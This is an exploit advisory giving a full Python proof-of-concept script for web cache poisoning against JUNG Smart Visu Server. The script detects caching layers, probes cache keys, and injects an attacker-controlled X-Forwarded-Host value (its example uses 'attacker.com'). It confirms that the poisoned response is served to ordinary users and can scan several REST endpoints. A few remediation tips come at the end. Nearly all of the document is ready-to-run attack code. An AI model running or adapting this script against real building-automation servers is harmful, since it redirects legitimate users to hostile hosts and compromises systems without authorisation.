============================================================================================================================================= | # Title : JUNG Smart Visu Server - Advanced Cache Poisoning Exploit | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) | | # Vendor : https://www.jung-group.com/en-DE | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/215522/ & ZSL-2026-5970 [+] Summary : This Python script is a PoC designed to detect and validate a web cache poisoning vulnerability in JUNG Smart Visu Server. The tool performs a structured and reliable validation process instead of relying on simple reflection checks. It: Detects the presence of a caching layer (CDN, proxy, reverse proxy) Analyzes cache-related HTTP headers (e.g., Age, X-Cache, CF-Cache-Status) Determines whether query strings or specific headers affect the cache key Attempts cache poisoning using the X-Forwarded-Host header Verifies the vulnerability by issuing a second normal request to confirm cache persistence Collects evidence such as poisoned responses and affected links If successful, the script confirms that malicious input can be stored in cache and served to normal users, demonstrating a confirmed cache poisoning condition. The PoC supports both single-endpoint testing and comprehensive multi-endpoint scanning modes. [+] POC : #!/usr/bin/env python3 import requests import sys import time import hashlib import urllib3 from urllib.parse import urlparse, parse_qs from typing import Dict, List, Optional, Tuple import json urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class JUNGCachePoisoningExploit: def __init__(self, target_url: str, malicious_host: str, verbose: bool = True): self.target_url = target_url.rstrip('/') self.malicious_host = malicious_host self.verbose = verbose self.session = requests.Session() self.session.verify = False self.session.timeout = 10 self.cache_headers = [ 'Cache-Control', 'Age', 'X-Cache', 'X-Cache-Lookup', 'CF-Cache-Status', 'X-Varnish', 'Via', 'X-Proxy-Cache', 'X-Cache-Status', 'Server-Timing', 'X-Drupal-Cache', 'X-Nginx-Cache', 'X-Accel-Expires' ] def log(self, message: str, level: str = "INFO"): """Logging with colors""" colors = { "INFO": "\033[94m[*]\033[0m", "SUCCESS": "\033[92m[+]\033[0m", "WARNING": "\033[93m[!]\033[0m", "ERROR": "\033[91m[-]\033[0m", "VULN": "\033[91m[OK]\033[0m" } if self.verbose or level in ["ERROR", "VULN", "WARNING"]: print(f"{colors.get(level, '[*]')} {message}") def analyze_cache_headers(self, headers: Dict) -> Dict: """Analyze cache-related headers""" cache_info = { 'is_cached': False, 'cache_headers': {}, 'cache_control': {}, 'age': None, 'cache_hit': False } for header in self.cache_headers: if header.lower() in {h.lower() for h in headers}: actual_header = next(h for h in headers if h.lower() == header.lower()) cache_info['cache_headers'][actual_header] = headers[actual_header] if 'Cache-Control' in headers: cache_directives = headers['Cache-Control'].split(',') for directive in cache_directives: d = directive.strip().lower() if '=' in d: key, value = d.split('=', 1) cache_info['cache_control'][key] = value else: cache_info['cache_control'][d] = True if 'Age' in headers: try: cache_info['age'] = int(headers['Age']) cache_info['is_cached'] = True cache_info['cache_hit'] = cache_info['age'] > 0 except: pass for header in ['X-Cache', 'X-Cache-Lookup', 'CF-Cache-Status']: if header in headers: value = headers[header].lower() if 'hit' in value: cache_info['cache_hit'] = True cache_info['is_cached'] = True cache_info['cache_headers'][header] = headers[header] return cache_info def detect_caching_layer(self) -> Dict: """Detect if there's a caching layer (proxy, CDN, etc.)""" cache_layer = { 'has_cache': False, 'cache_type': None, 'cache_details': {} } test_param = f"test_{int(time.time())}" url = f"{self.target_url}/rest/items?{test_param}=1" try: response1 = self.session.get(url) cache1 = self.analyze_cache_headers(response1.headers) time.sleep(0.5) response2 = self.session.get(url) cache2 = self.analyze_cache_headers(response2.headers) if cache2.get('cache_hit') or (cache2.get('age') and cache2['age'] > 0): cache_layer['has_cache'] = True cache_layer['cache_details']['first_request'] = cache1 cache_layer['cache_details']['second_request'] = cache2 if 'X-Cache' in response2.headers: cache_layer['cache_type'] = 'Generic Proxy Cache' if 'CF-Cache-Status' in response2.headers: cache_layer['cache_type'] = 'CloudFlare CDN' if 'X-Varnish' in response2.headers: cache_layer['cache_type'] = 'Varnish Cache' if 'Via' in response2.headers and 'nginx' in response2.headers.get('Via', '').lower(): cache_layer['cache_type'] = 'Nginx Proxy' self.log(f"Detected caching layer: {cache_layer['cache_type'] or 'Unknown'}", "SUCCESS") else: self.log("No caching layer detected", "WARNING") except Exception as e: self.log(f"Error detecting cache: {str(e)}", "ERROR") return cache_layer def test_cache_key_variations(self, endpoint: str) -> Dict: """Test what variations affect the cache key""" cache_key_info = { 'query_string_matters': False, 'headers_matter': {}, 'vary_headers': [] } base_url = f"{self.target_url}{endpoint}" test_payload = f"test_{hash(time.time())}" try: url1 = f"{base_url}?test1={test_payload}" url2 = f"{base_url}?test2={test_payload}" response1 = self.session.get(url1) response2 = self.session.get(url2) if hashlib.md5(response1.content).digest() != hashlib.md5(response2.content).digest(): cache_key_info['query_string_matters'] = True if 'Vary' in response1.headers: vary_headers = [h.strip() for h in response1.headers['Vary'].split(',')] cache_key_info['vary_headers'] = vary_headers for vary_header in vary_headers: if vary_header.lower() in ['cookie', 'authorization', 'user-agent']: headers1 = {vary_header: 'test1'} headers2 = {vary_header: 'test2'} resp1 = self.session.get(url1, headers=headers1) resp2 = self.session.get(url1, headers=headers2) if hashlib.md5(resp1.content).digest() != hashlib.md5(resp2.content).digest(): cache_key_info['headers_matter'][vary_header] = True except Exception as e: self.log(f"Error testing cache key: {str(e)}", "ERROR") return cache_key_info def attempt_cache_poisoning(self, endpoint: str = "/rest/items") -> Tuple[bool, Dict]: """ Attempt to poison the cache and verify with a second request """ self.log(f"\n[*] Attempting cache poisoning on {endpoint}") cache_layer = self.detect_caching_layer() if not cache_layer['has_cache']: self.log("No cache detected, cannot perform cache poisoning", "WARNING") return False, {'error': 'no_cache'} cache_key_info = self.test_cache_key_variations(endpoint) self.log(f"Query string affects cache key: {cache_key_info['query_string_matters']}") poison_param = "poison_test" if cache_key_info['query_string_matters']: poison_url = f"{self.target_url}{endpoint}?{poison_param}=1" else: poison_url = f"{self.target_url}{endpoint}" headers = { "User-Agent": "Mozilla/5.0 (Poisoning-Test)", "X-Forwarded-Host": self.malicious_host, "Accept": "application/json", "Cache-Control": "no-cache" } self.log(f"Sending poisoned request with X-Forwarded-Host: {self.malicious_host}") poison_response = self.session.get(poison_url, headers=headers) if self.malicious_host not in poison_response.text: self.log("Malicious host not reflected in response", "ERROR") return False, {'error': 'no_reflection'} self.log("Malicious host reflected in response", "SUCCESS") self.log("\n[*] Verifying cache poisoning with second request...") time.sleep(1) verify_headers = { "User-Agent": "Mozilla/5.0 (Normal-User)", "Accept": "application/json" } verify_response = self.session.get(poison_url, headers=verify_headers) if self.malicious_host in verify_response.text: self.log("CACHE POISONING CONFIRMED!", "VULN") self.log(f"Malicious host '{self.malicious_host}' served to normal user", "VULN") cache_info = self.analyze_cache_headers(verify_response.headers) if cache_info['cache_hit']: self.log("Response came from cache (cache hit)", "SUCCESS") evidence = { 'poisoned_url': poison_url, 'malicious_host': self.malicious_host, 'cache_layer': cache_layer, 'cache_headers': cache_info, 'poisoned_response_sample': poison_response.text[:500] + "...", 'verified_response_sample': verify_response.text[:500] + "..." } try: data = verify_response.json() if isinstance(data, list): poisoned_links = [item.get('link') for item in data if 'link' in item and self.malicious_host in item.get('link', '')] evidence['poisoned_links'] = poisoned_links[:5] except: pass return True, evidence else: self.log("Cache poisoning failed - normal request doesn't show malicious host", "WARNING") self.log("Checking cache headers of normal request:") cache_info = self.analyze_cache_headers(verify_response.headers) for header, value in cache_info['cache_headers'].items(): self.log(f" {header}: {value}") return False, {'error': 'poisoning_failed'} def comprehensive_scan(self): """Scan multiple endpoints for cache poisoning vulnerability""" self.log("\n" + "="*60) self.log("Starting comprehensive cache poisoning scan", "INFO") self.log("="*60) endpoints = [ "/rest/items", "/rest/ui", "/rest/configuration", "/rest/devices", "/", "/api/v1/items" ] vulnerable_endpoints = [] for endpoint in endpoints: self.log(f"\n[*] Testing endpoint: {endpoint}") success, result = self.attempt_cache_poisoning(endpoint) if success: vulnerable_endpoints.append({ 'endpoint': endpoint, 'evidence': result }) if 'poisoned_links' in result: self.log("\nPoisoned links detected:", "VULN") for link in result['poisoned_links']: self.log(f" {link}", "VULN") time.sleep(2) return vulnerable_endpoints def main(): """Main function""" if len(sys.argv) < 3: print("Usage: python3 exploit_advanced.py ") print("Example: python3 exploit_advanced.py http://10.0.0.16:8080 attacker.com") print("Options:") print(" --scan Perform comprehensive scan of all endpoints") print(" --endpoint Specify custom endpoint") sys.exit(1) target = sys.argv[1] malicious = sys.argv[2] exploit = JUNGCachePoisoningExploit(target, malicious, verbose=True) if "--scan" in sys.argv: results = exploit.comprehensive_scan() print("\n" + "="*60) print("SCAN RESULTS") print("="*60) if results: print(f"\nFound {len(results)} vulnerable endpoints:") for r in results: print(f" - {r['endpoint']}") if 'poisoned_links' in r['evidence']: print(f" Sample poisoned links:") for link in r['evidence']['poisoned_links'][:3]: print(f" {link}") else: print("\nNo vulnerable endpoints found (or cache poisoning not confirmed)") else: endpoint = "/rest/items" for i, arg in enumerate(sys.argv): if arg == "--endpoint" and i+1 < len(sys.argv): endpoint = sys.argv[i+1] success, evidence = exploit.attempt_cache_poisoning(endpoint) if success: print("\n" + "="*60) print("VULNERABLE TO CACHE POISONING") print("="*60) print(f"Target: {target}") print(f"Endpoint: {endpoint}") print(f"Malicious host: {malicious}") if 'poisoned_links' in evidence: print("\nPoisoned links detected:") for link in evidence['poisoned_links']: print(f" {link}") print("\n[!] Recommendations:") print(" - Update JUNG Smart Visu Server") print(" - Validate/sanitize X-Forwarded-Host header") print(" - Configure proxy to strip or validate proxy headers") print(" - Implement host header whitelisting") else: print("\n Target not vulnerable to confirmed cache poisoning") if __name__ == "__main__": main() Greetings to :====================================================================== jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)| ====================================================================================